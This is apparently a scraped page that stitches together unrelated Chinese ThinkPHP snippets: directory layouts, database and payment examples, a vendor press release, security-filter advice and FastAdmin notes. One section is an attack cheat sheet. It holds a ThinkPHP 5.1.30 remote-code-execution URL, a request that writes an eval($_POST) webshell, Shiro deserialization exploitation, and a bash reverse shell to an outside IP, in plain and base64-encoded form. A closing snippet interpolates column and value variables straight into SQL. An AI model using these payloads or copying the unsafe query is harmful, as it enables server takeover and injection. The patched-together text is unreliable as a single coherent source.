ThinkPHP

最初使用 ThinkPHP3 .2 .3的时候，我们自己定义的公共函数常常放置于 \ Common\ function .php ThinkPHP5.1 公共函数 项目公用的会放在 \ application\ common .php，如果是模块中的，则会放在\ application\ yourModules\ common .php www WEB部署目录（或者子目录） ├─application 应用目录 │ ├─common 公共模块目录（可以更改） │ ├─module_name 模块目录 │ │ ├─common .php 模块函数文件 │ │ ├─controller 控制器目录 │ │ ├─model 模型目录 │ │ ├─view 视图目录 │ │ ├─config 配置目录 │ │ └─ . . . 更多类库目录 │ │ │ ├─command .php 命令行定义文件 │ ├─common .php 公共函数文件 │ └─tags .php 应用行为扩展定义文件 来源： oschina 链接： https://my.oschina.net/u/4317546/blog/3527206

“做电商，选商淘”这句话已经成为电商行业的顺口溜，商淘是一家专注电商一体化、拥有自主知识产权的互联网软件企业，是一家国内领先的电商软件服务提供商。商淘软件自成立起一直坚持“促进客户发展、实现企业价值”的服务理念，以“关注企业需求，实现企业价值”为导向，向中商北斗集团、横琴美印股份、南方新闻网、东海水晶投资、鑫玉龙集团等知名企业提供软件服务。 商淘软件B2B2C电子商务系统是一款基于ThinkPHP 5.1框架打造的多用户电商平台，是一款能快速搭建京东、天猫模式的支持商户入驻的平台型电商系统软件，是目前完善度领先的电商管理平台标准化产品。三周年之际，商淘软件宣布将旗下B2B2C商城系统代码开源，这一举措将多用户商城平台建设模式再次升级。 商淘软件B2B2C电商系统在目前行业内领先完善的电商管理平台标准化产品，可快速上线京东、天猫类支持商户入驻的平台型商城，系统采用国内最流行的ThinkPHP 5.1框架搭建，降低系统二次开发门槛；系统采用主核心功能高内聚、辅助功能低耦合的插拔式设计，让系统的开发和后期维护成本更低。商淘软件创始人马永胜先生说：“商淘软件是带着降低中小企业开发成本的使命成立的，在过去的三年里，商淘已经为部分需要电商转型的企业降低了很大的电商建设成本，在未来的三年里，我们愿与更多的开发者一起丰富B2B2C的电商生态，为更多的需要转型的企业降低开发成本。”

一 Thinkphp-5.1.30 /index.php?s=index/think\app/invokefunction&function=call _user_ func_array&vars[ 0 ]=system&vars[ 1 ][ ]=whoami /index.php/? s = index /\think\template\driver\file/ write &cacheFile=kanhayou.php&content=%3C?php%C2%A0@eval($_POST[kanhayou]);?%3E 二 Shiro-反序列化 出网验证： https: //github.com/sv3nbeast/ShiroScan python3 shiro_rce.py http: //xx.xx.70.24:40817 "ping cqehyd.dnslog.cn" 准备工作： bash -i >& /dev/tcp/123.123.151.3/8003 0>&1 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUxLjMvODA123123}|{base64,-d}|{bash,-i} nc -lvvp 8003 利用： https: //github.com/insightglacier/Shiro

本文将提到： 1.原生查询操作的读操作：query（） 2.原生查询操作的写操作：insert/update/delete,execute() 3.查询构造器 4.where()函数：可以根据其他字段查询 5.order()，limit()函数 对于数据库的配置在框架中app\config\database.php中已经配置好了，所以下面将默认已经连接上了数据库 作为例子展示的数据表： 1.原生查询操作的读操作：query（） public function demo1() { $sql = "SELECT `userName` FROM `admin` WHERE `id`=:id " ; $map = ['id' => 1 ]; $res = Db::query( $sql , $map ); dump( $res ); // 打印查询结果$res } 2.原生查询操作的写操作：insert/update/delete,execute() public function demo2() { $sql = "UPDATE `admin` SET `status`=:status WHERE `id`=:id " ; $map = ['id' => 1, 'status' => 0 ]; $res = Db::execute( $sql , $map ); return

1、在vendor 目录使用composer安装 ，命令： composer require yansongda/pay -vvv 2、在控制器中引用 Yansongda\Pay\Pay 微 信支付： public function done(){ $config = [ 'appid' => 'wxb3fxxxxxxxxxxx', // APP APPID 'app_id' => 'appid', // 公众号 APPID 'miniapp_id' => 'wxb3fxxxxxxxxxxx', // 小程序 APPID 'mch_id' => 'merchant', // 商户ID 'key' => 'secretkey', 'notify_url' => url('user/public/wechatNotify',[],true,true), 'cert_client' => './cert/apiclient_cert.pem', // optional, 退款，红包等情况时需要用到 'cert_key' => './cert/apiclient_key.pem',// optional, 退款，红包等情况时需要用到 'log' => [ // optional 'file' => LOG_PATH.'logs/wechat.log', 'level' => 'info',

Think PHP 5验证码不显示的原因及解决方法 参考文章： （1）ThinkPHP5验证码不显示的原因及解决方法 （2）https://www.cnblogs.com/shengxihui/p/11295894.html 备忘一下。 来源： oschina 链接： https://my.oschina.net/u/4437884/blog/4914988

输入安全 设置public目录为唯一对外访问目录，不能把资源文件放入到应用目录； 使用框架提供的请求变量获取方法（Request类的param方法及input助手函数）而不是原生系统变量获取用户输入的数据； 使用验证类或者验证方法对业务数据设置必要的验证规则； 设置安全过滤函数对用户输入的数据进行过滤处理。 htmlspecialchars()此函数是将用户输入的所有信息原样输出。 避免用户输入的html，js等代码被浏览器解析影响服务器原来的功能，有效避免黑客攻击。 strip_tags() 函数默认删除字符串中所有html标签，也可以指定删除部分html标签。 <?php $str = "<font color='red' size=7>Linux</font> <i>Apache</i> <u>Mysql</u> <b>PHP</b>"; echo strip_tags($str); //删除了全部HTML标签，输出：Linux Apache Mysql PHP echo strip_tags($str,"<font>"); //输出<font color='red' size=7>Linux</font>Apache Mysql PHP echo strip_tags($str,"<b><u><i>"); //输出Linux <i>Apache</i> <u>Mysql<

ThinkPHP5 新增了重定向时隐式传参 下面是官方介绍: 可以在重定向的时候通过session闪存数据传值，例如 $ this ->redirect( ' News/category ' , [ ' cate_id ' => 2 ], 302 , [ ' data ' => ' hello ' ]); 上面也说了,是通过session传值, 那方法就是获取session中存的值 // 取值（当前作用域） Session:: get ( ' name ' ); // 删除（当前作用域） Session::delete( ' name ' ); // 取值并删除 Session::pull( ' name ' ); // 清除session（当前作用域） Session::clear(); /* * *助手函数 * */ // 赋值（当前作用域） session( ' name ' , ' thinkphp ' ); // 赋值think作用域 session( ' name ' , ' thinkphp ' , ' think ' ); // 判断（当前作用域）是否赋值 session( ' ?name ' ); // 取值（当前作用域） session( ' name ' ); // 取值think作用域 session( ' name ' , '' , ' think ' )

FastAdmin是一款基于ThinkPHP5+Bootstrap的极速后台开发框架。 感觉挺好用的。 开发文档 https://doc.fastadmin.net/docs/index.html 根据文档就能马上安装上手。前提是你会thinkphp5，有过基础。 FastAdmin目录结构遵循ThinkPHP5官方建议的模块设计： FastAdmin项目目录 ├── addons //插件存放目录 ├── application //应用目录 │ ├── admin //后台管理应用模块 │ ├── api //API应用模块 │ ├── common //通用应用模块 │ ├── extra //扩展配置目录 │ ├── index //前台应用模块 │ ├── build.php │ ├── command.php //命令行配置 │ ├── common.php //通用辅助函数 │ ├── config.php //基础配置 │ ├── database.php //数据库配置 │ ├── route.php //路由配置 │ ├── tags.php //行为配置 ├── extend │ └── fast //FastAdmin扩展辅助类目录 ├── public │ ├── assets │ │ ├── build //打包JS、CSS的资源目录 │ │ ├──

// +--------------------------------------------------------------- // | update o2o_users set gold = (gold + '-1') where user_id = '245' // +--------------------------------------------------------------- public function updateCount($id,$col,$num = 1){ // 245, gold, 1 $id = (int)$id; return $this->execute(" update ".$this->getTableName()." set {$col} = ({$col} + '{$num}') where ".$this->pk." = '{$id}' "); //execute 常用作update和insert,返回影响的行数 //query常用作select,放回影响的数集，array() //update o2o_users set gold = (gold + '-1') where user_id = '245' } 来源： oschina 链接： https://my.oschina.net/u/2519486/blog